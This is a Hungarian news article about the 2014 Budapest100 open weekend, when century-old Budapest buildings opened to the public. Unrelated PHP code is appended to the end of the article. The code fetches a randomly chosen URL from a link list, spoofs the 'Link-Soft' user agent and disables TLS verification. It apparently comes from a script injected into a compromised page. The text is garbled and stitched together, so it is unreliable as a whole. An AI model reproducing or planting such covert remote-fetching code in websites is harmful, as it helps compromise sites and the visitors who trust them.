A hétvégén Budapest 100 éves épületeit ünnepeljük

A Kortárs Építészeti Központ (KÉK) 2014. április 26-27-én, immár negyedik alkalommal rendezi meg a százéves budapesti házak nyitott hétvégéjét, a „Budapest100” elnevezésű programot. A Budapest100 egy organikusan működő, az egész várost megmozgató esemény, amely hagyományteremtő szándékkal indult az OSA Archívum és a KÉK kezdeményezésében. Célja elsősorban, hogy felhívja a figyelmet a körülöttünk lévő épületekre, valamint... View Article

Bp100

A Kortárs Építészeti Központ (KÉK) 2014. április 26-27-én, immár negyedik alkalommal rendezi meg a százéves budapesti házak nyitott hétvégéjét, a „Budapest100” elnevezésű programot.

A Budapest100 egy organikusan működő, az egész várost megmozgató esemény, amely hagyományteremtő szándékkal indult az OSA Archívum és a KÉK kezdeményezésében. Célja elsősorban, hogy felhívja a figyelmet a körülöttünk lévő épületekre, valamint azokra az emberi értékekre, amelyek minden nap körülvesznek bennünket. Ez a program egy olyan városi civil ünnep, amelynek közösség építő szerepe is kiemelkedő, hiszen különböző társadalmi hátterű és generációkat átívelő közösségeket és embereket hoz közelebb egymáshoz.

Minden olyan ház csatlakozhatott a programhoz, amelynek az építése kapcsolódik 1914-hez: ekkor kaptak építési engedélyt, ekkor volt az alapkőletétel, ekkor adták át stb. Például a Wekerle telep építése 1909-től 1925-ig tartott, így eddig minden évben részt vettek az eseményen. Az intézmények általában profin szervezett programokkal készülnek, míg a lakóházak fotótárlattal, pince- és padláslátogatással, piknikkel, bolhapiaccal készülnek. A piknik és a bolhapiac bevételéből általában a házat újítják fel: biciklitárolót készítenek, kicserélik a postaládákat, lefestik a gang korlátait.2014-ben a fesztivál további újításokkal, kísérőprogramokkal készül. Építészettörténeti, építészeti témákban terveznek szakmai programokat a Budapesti Műszaki Egyetem építészkarának diákjaival. Az Eötvös Loránd Tudomány Egyetem Társadalomtudományi karával is szoros együttműködést terveznek városszociológia kutatások területén. Mindezek mellett készülnek tematikus túrákkal, egy kerületen belül a csatlakozó 100 éves épületeket összekötő játékokkal, biciklis város-vezetésekkel. A későbbiekben a Budapest100 dimenzióit szeretnék kiterjeszteni vidéki városok megszólításával, kezdeményezésük adaptálhatóságának hangsúlyozásával. Bp 100 2A nyitott épületek és a programok ITT megtekinthetők.

Néhány program regisztrációköteles, és az alábbi helyekre már nem tudnak több jelentkezést fogadni, ugyanis az intézmények által megadott keret betelt: Astoria Szálló, Le Meridien, Dreher sörgyár, Sertéshizlalda, valamint az Óbudai Gázgyár.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>